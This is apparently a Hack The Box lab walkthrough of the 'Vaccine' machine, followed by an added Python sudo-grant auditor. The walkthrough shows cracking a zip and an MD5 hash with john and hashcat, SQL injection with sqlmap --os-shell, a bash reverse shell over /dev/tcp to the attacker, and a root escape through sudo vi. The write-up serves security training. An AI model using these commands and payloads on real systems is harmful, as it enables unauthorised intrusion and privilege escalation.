Vaccine - HTB



Pub. on 2022-06-10
  1. nmap scan
Starting Nmap 7.92 ( ) at 2022-06-09 23:39 UTC
Nmap scan report for
Host is up (0.87s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 112.70 seconds
  1. Looking at the nmap script output, anonymous login via FTP is possible and a file can be obtained

  2. After getting it, an attempt to unzip it prompts for a password. Using john, the password can be obtained

zip2john > hash.txt
  1. After obtaining the hash.txt file, use john to crack the password
john hash.txt # output => 741852963
  1. The password (741852963, obtainable by running john --show hash.txt) is then used to extract the zip archive
  1. Running cat on index.php reveals an md5 hash of the admin's password. A quick google search for 'reverse md5 hash' brings up tools to do that, and the password is found to be 'qwerty789'. An alternative method is to use hashcat in the format below:
echo "<HASH>" > hash
hashcat -a 0 -m 0 hash /usr/share/seclist/rockyou.txt
  1. Then log in to the portal, and a dashboard is presented. It has a search component that seems to update the table, and the URL shows a parameter being passed. So it's possible to test for SQL injection, and instead of doing it manually, sqlmap is a great tool

  2. Running sqlmap -h shows some very helpful commands and ways to use the tool. In this case, we provide the URL and the cookie, the latter of which provides authentication

sqlmap -u 'http://{IP}/dashboard.php?search=any' --cookie="PHPSESSID={ID}"
  1. The output from sqlmap shows the GET param 'search' is vulnerable. The command is run once more, this time with the extra flag --os-shell, to enable command injection

  2. A shell is gotten, however not a pleasant one. A way to get a better one is to run

bash -c "bash -i >& /dev/tcp/{IP}/12345 0>&1"

and then start a nc listener on port 12345. After getting a connection, we can make the shell better and more stable:

python3 -c 'import pty; pty.spawn("/bin/bash")'
^Z # ctrl + z
stty raw -echo;fg # PRESS ENTER TWICE
export TERM=xterm
  1. Enumerating around reveals the postgres password under /var/www/html. This password can be used to login via ssh as postgres.

  2. Once in, a great step to take first would be to run 'sudo -l' so as to list the user's privileges. We have the permission to run /bin/vi on pg_hba.conf file as sudo. By looking up on GTFOBins, one can see ways of abusing privileges, and this is what worked and produced a root shell. (After accessing vim, press escape and run commands using the syntax :! - where :!/bin/sh presents us with a prompt as root)

sudo -l
# <-- SNIP -->
# User postgres may run the following commands on vaccine:
#     (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
# <-- SNIP -->
sudo vi /etc/postgresql/11/main/pg_hba.conf
whoami # root
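
For the defensive side of this last step, the following added example (not part of the original write-up) scans `sudo -l` output for grants like the `/bin/vi` entry above that allow a shell escape, and suggests a `sudoedit` or `NOEXEC:` replacement. The function and set names are hypothetical, the program lists are a small assumed subset of what GTFOBins documents, and only the first grant line in the sample comes from this page; the other two are constructed.

```python
import os
import re

# Interactive programs that can spawn a shell from inside a session.
# Assumed subset for this example; GTFOBins documents many more.
EDITORS = {"vi", "vim", "nano", "ed"}
VIEWERS = {"view", "less", "more", "man"}

GRANT = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<cmds>.+)$")  # "(ALL) /bin/vi ..."
TAG = re.compile(r"^([A-Z_]+):\s*")                             # "NOPASSWD: ", "NOEXEC: "

def audit_sudo_listing(text):
    """Return (runas, command, advice) for each grant that permits a shell escape."""
    findings = []
    for line in text.splitlines():
        m = GRANT.match(line)
        if not m:
            continue  # header lines, "Matching Defaults entries", etc.
        noexec = False  # sudoers tags carry over to later commands on the same line
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            while (t := TAG.match(cmd)):
                if t.group(1) in ("NOEXEC", "EXEC"):
                    noexec = t.group(1) == "NOEXEC"
                cmd = cmd[t.end():]
            argv = cmd.split()
            if not argv or noexec:
                continue  # NOEXEC already blocks the escape
            name = os.path.basename(argv[0])
            if name in EDITORS and len(argv) > 1:
                advice = "grant 'sudoedit %s' instead" % " ".join(argv[1:])
            elif name in EDITORS | VIEWERS:
                advice = "tag the grant NOEXEC: or remove it"
            else:
                continue
            findings.append((m.group("runas"), cmd, advice))
    return findings

# First grant line is the one shown on this page; the other two are constructed.
SAMPLE = """\
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
    (root) NOPASSWD: /usr/bin/pg_ctlcluster 11 main reload, NOEXEC: /usr/bin/less /var/log/syslog
    (root) sudoedit /etc/postgresql/11/main/pg_hba.conf
"""

if __name__ == "__main__":
    for runas, cmd, advice in audit_sudo_listing(SAMPLE):
        print(f"[!] as ({runas}): {cmd} -> {advice}")
```

Only the `/bin/vi` grant is reported: `sudoedit` edits a temporary copy as the invoking user, so the same file can be maintained without an editor ever running as root.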
** THE END **